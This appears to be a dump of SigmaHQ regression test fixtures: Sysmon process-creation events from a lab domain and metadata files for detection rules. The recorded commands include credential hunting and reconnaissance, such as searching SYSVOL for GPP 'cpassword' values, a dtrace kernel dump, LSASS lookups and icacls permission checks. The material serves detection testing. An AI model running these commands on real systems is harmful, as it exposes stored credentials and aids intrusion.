================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-27T00:04:12.105550Z"
}
},
"EventRecordID": 33630917,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3380,
"ThreadID": 4420
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-27 00:04:12.104",
"ProcessGuid": "5AA13A44-B6FC-68FE-0802-000000004102",
"ProcessId": 2524,
"Image": "C:\\Program Files\\DTrace\\dtrace.exe",
"FileVersion": "10.0.22621.1 (WinBuild.160101.0800)",
"Description": "DTrace/NT",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "dtrace.exe",
"CommandLine": "dtrace.exe -w \"syscall:::return {lkd(0); exit(0);}\"",
"CurrentDirectory": "C:\\Program Files\\DTrace\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000",
"LogonId": "0xc47e5",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413",
"ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102",
"ParentProcessId": 10508,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-27T00:04:13.045253Z"
}
},
"EventRecordID": 33630948,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3380,
"ThreadID": 4420
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-27 00:04:13.044",
"ProcessGuid": "5AA13A44-B6FD-68FE-0902-000000004102",
"ProcessId": 7748,
"Image": "C:\\Program Files\\DTrace\\dtrace.exe",
"FileVersion": "10.0.22621.1 (WinBuild.160101.0800)",
"Description": "DTrace/NT",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "dtrace.exe",
"CommandLine": "dtrace.exe -w -n \"syscall:::return {lkd(0); exit(0);}\"",
"CurrentDirectory": "C:\\Program Files\\DTrace\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000",
"LogonId": "0xc47e5",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413",
"ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102",
"ParentProcessId": 10508,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml
================================================
id: c81d2cc0-3296-47fd-b57d-334b3a17ab02
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795
title: Suspicious Kernel Dump Using Dtrace
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-27T00:08:16.515256Z"
}
},
"EventRecordID": 33635575,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3380,
"ThreadID": 4420
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-27 00:08:16.514",
"ProcessGuid": "5AA13A44-B7F0-68FE-2902-000000004102",
"ProcessId": 9040,
"Image": "C:\\Windows\\explorer.exe",
"FileVersion": "10.0.20348.3692 (WinBuild.160101.0800)",
"Description": "Windows Explorer",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "EXPLORER.EXE",
"CommandLine": "explorer shell:MyComputerFolder",
"CurrentDirectory": "C:\\Program Files\\DTrace\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000",
"LogonId": "0xc47e5",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=8BAA602FDC6BA67545C0717E2B9063A0BFE3F278,MD5=1FB8907465FB58429762D97C1FBEA04A,SHA256=53F36699C35C8F2360608A79F0809BA888C61F15886AE2B1F209A3E9B896CBA7,IMPHASH=BECD30EE79098B21A5BA5E5CF0E18B83",
"ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102",
"ParentProcessId": 10508,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml
================================================
id: ddbc40a4-117f-4359-9a22-f943dd25535f
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: c3d76afc-93df-461e-8e67-9b2bad3f2ac4
title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:50:13.199218Z"
}
},
"EventRecordID": 9105822,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:50:13.191",
"ProcessGuid": "5AA13A44-D595-68FC-0A31-000000004002",
"ProcessId": 7772,
"Image": "C:\\Windows\\System32\\findstr.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Find String (QGREP) Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "FINDSTR.EXE",
"CommandLine": "findstr /S cpassword \\\\AR-WIN-DC\\sysvol\\*.xml",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml
================================================
id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 91a2c315-9ee6-4052-a853-6f6a8238f90d
title: Findstr GPP Passwords
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:41:46.744119Z"
}
},
"EventRecordID": 12151329,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:41:46.742",
"ProcessGuid": "5AA13A44-0BDA-68FD-7836-000000004002",
"ProcessId": 8892,
"Image": "C:\\Windows\\System32\\findstr.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Find String (QGREP) Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "FINDSTR.EXE",
"CommandLine": "findstr lsass",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F",
"ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002",
"ParentProcessId": 3204,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/info.yml
================================================
id: 241a8371-1554-4cfc-8a51-c671669f4a71
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: fe63010f-8823-4864-a96b-a7b4a0f7b929
title: LSASS Process Reconnaissance Via Findstr.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:47:01.671694Z"
}
},
"EventRecordID": 12249325,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:47:01.664",
"ProcessGuid": "5AA13A44-0D15-68FD-B436-000000004002",
"ProcessId": 2764,
"Image": "C:\\Windows\\System32\\icacls.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "-",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "iCACLS.EXE",
"CommandLine": "icacls \"C:\\Program Files\\*\"",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=0EB3DC9113AE28D77A85A52B3BF7B79A4B7FD24E,MD5=4B8207877186FAFFB90E3A4D9358CBA6,SHA256=054355C415F5686DA598011065E6FDF6BED35C5FDDA81BC5BF22B9D093CC30E2,IMPHASH=446163A548337B5BCF2727BCD1CFB399",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:47:01.679477Z"
}
},
"EventRecordID": 12249342,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:47:01.673",
"ProcessGuid": "5AA13A44-0D15-68FD-B536-000000004002",
"ProcessId": 9016,
"Image": "C:\\Windows\\System32\\findstr.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Find String (QGREP) Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "FINDSTR.EXE",
"CommandLine": "findstr \"(M)\"",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:47:01.687849Z"
}
},
"EventRecordID": 12249358,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:47:01.681",
"ProcessGuid": "5AA13A44-0D15-68FD-B636-000000004002",
"ProcessId": 3356,
"Image": "C:\\Windows\\System32\\findstr.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Find String (QGREP) Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "FINDSTR.EXE",
"CommandLine": "findstr \"Everyone\"",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml
================================================
id: bfab9c3b-5f4b-496c-aa6a-8870fec99738
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 47e4bab7-c626-47dc-967b-255608c9a920
title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:51:29.178909Z"
}
},
"EventRecordID": 9129415,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:51:29.168",
"ProcessGuid": "5AA13A44-D5E1-68FC-1131-000000004002",
"ProcessId": 3384,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "cmd /c \"tasklist | findstr powershell\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml
================================================
id: 5bb16f46-e370-4a40-a47a-d047e4482fc1
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: ccb5742c-c248-4982-8c5c-5571b9275ad3
title: Recon Command Output Piped To Findstr.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:52:18.663980Z"
}
},
"EventRecordID": 9145421,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:52:18.657",
"ProcessGuid": "5AA13A44-D612-68FC-1931-000000004002",
"ProcessId": 5144,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "cmd /c \"tasklist | findstr virus\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:52:18.675229Z"
}
},
"EventRecordID": 9145437,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:52:18.674",
"ProcessGuid": "5AA13A44-D612-68FC-1A31-000000004002",
"ProcessId": 6320,
"Image": "C:\\Windows\\System32\\tasklist.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Lists the current running tasks",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "tasklist.exe",
"CommandLine": "tasklist",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE",
"ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002",
"ParentProcessId": 5144,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "cmd /c \"tasklist | findstr virus\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:52:18.677359Z"
}
},
"EventRecordID": 9145443,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:52:18.676",
"ProcessGuid": "5AA13A44-D612-68FC-1B31-000000004002",
"ProcessId": 9052,
"Image": "C:\\Windows\\System32\\findstr.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Find String (QGREP) Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "FINDSTR.EXE",
"CommandLine": "findstr virus",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F",
"ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002",
"ParentProcessId": 5144,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "cmd /c \"tasklist | findstr virus\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml
================================================
id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9
description: N/A
